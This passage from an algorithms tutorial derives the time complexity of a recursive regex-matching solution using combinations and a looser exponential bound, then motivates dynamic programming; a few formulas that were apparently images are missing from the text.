The way to systematically consider how many times a sub-problem will be encountered is to consider how come these sub-problems tend to repeat themselves in the first place. In order to arrive at (2,1) on our tree we have to take two lefts and one right.

As we can see this can happen in three ways, if we traverse the tree in the sequence LLR, LRL and RLL.

In the example of (2,1) we know that we will have 2+1=3 place holders where 2 of the placeholders will be an L and 1 will be an R. In order to find how many combinations are possible we can simply compute 3C2 where out of 3 place holders we will choose 2 to be an L and the rest will automatically be Rs.

That means that for sub-problem (i,j) we have i+j placeholders with i of those being the left side and j being on the right side. This is why the solutions include the combinations symbol for the number of encountered sub-problems (i,j) with (i+j choose i).

Incidentally this is also equivalent to (i+j choose j) because it does not matter whether you are picking which i increments are on the left or instead picking which j increments are on the right, the number of distinct combinations will be the same.

Sub-Problem Complexity

Now that we know how many sub-problems of each kind we will encounter, we should figure out how long those individual sub-problem will take to complete. This sort of thing tends to be very easy to do with recursive problems, like in this case where we only really do one thing, compare a single character and store the result in character_match. This might lead you to believe that the runtime for each sub-problem is constant O(1), but in order to call the function we must first supply text[i] and pattern[j:] arguments. If the strings are long, this procedure is not trivial, especially in python where in order to pass in a sub-string a new string must be created. Therefore for each sub-problem there is a constant time O(1) for checking that the character matched, an O(T-i) for passing in the part of the string that we don’t know is a match yet, and an O(P-2j) for passing in the part of the pattern that we don’t know is a match yet. Adding everything together we arrive at the complexity given in the solution.

The Concise Solution

Remember earlier when I said that the solution proposed a more general bound, without the complex combination notation and sigma signs.

Well here it is.

Let’s go through the idea behind this one before we wrap up.

The idea behind making the time complexity into this simplified form is to go overkill on both how many sub problems we could encounter and how long we plan on those sub problems taking to compute.

Number of Sub-problems

Instead of using combinations to compute precisely how many sub problems we will encounter, which based on our combinations calculation will be only a portion of our tree’s leaf nodes, let’s just take the entire bottom level of the tree.

Let’s also make the tree completely full with a depth of the maximum number that \(i+j\) can take, which is \((T+\frac{P}{2})\).

• T for the length of the text and \(\frac{P}{2}\) for all .* instances in our worst case pattern

• A tree of depth \((T+\frac{P}{2})\) will have \(2^{(T+\frac{P}{2})}\) nodes at the lowest level.

In the image we can see the previous example of text[2:] and pattern[2:] being computed \(\binom{2+1}{2}\) = 3 times, but since we know that all these examples happen on the same level (because # of Ls+ # of Rs is always 3) we can compute the number of all sub problems on that level which is \(2^{(2+\frac{2}{2})}\) = 2³ = 8.

The number of nodes on the entire level (8 in this case) will always be larger than the \(\binom{i+j}{j}\) nodes (3 in this case), so we can use this calculation in our more general upper bound. So we have determined that our upper bound will assume that we will go through \(2^{(T+\frac{P}{2})}\) subproblems, even though we really never will, but it does make our formula more concise.

Sub-problem Complexity

Instead of computing how large the arguments will be before we pass them in, let’s just assume we are passing in the entire strings for both the text and pattern. This will give us O(T+P) time complexity for each sub-problem, eliminating the need to compute what O(T-i) and O(P-2j) are at every step.

Final Answer

Multiplying the Sub-problem complexity by the number of sub-problems gives us the final answer of:

A Case for Dynamic Programming

This was all incredibly tedious and time consuming on both ours and the computer’s part. At some point you probably thought that computing the same problem (i+j choose i ) times was a bit wasteful and if we just stored that result it would save us a lot of trouble. You’d be right.

There’s only T*P distinct combinations of (i,j), and each takes only constant time to verify, so simply storing all of them in a grid will bump our computation down to a whopping.

I hope you enjoyed this exercise in computational complexity. Seeing as you got to the very end, do give yourself a pat on the back because you deserve it.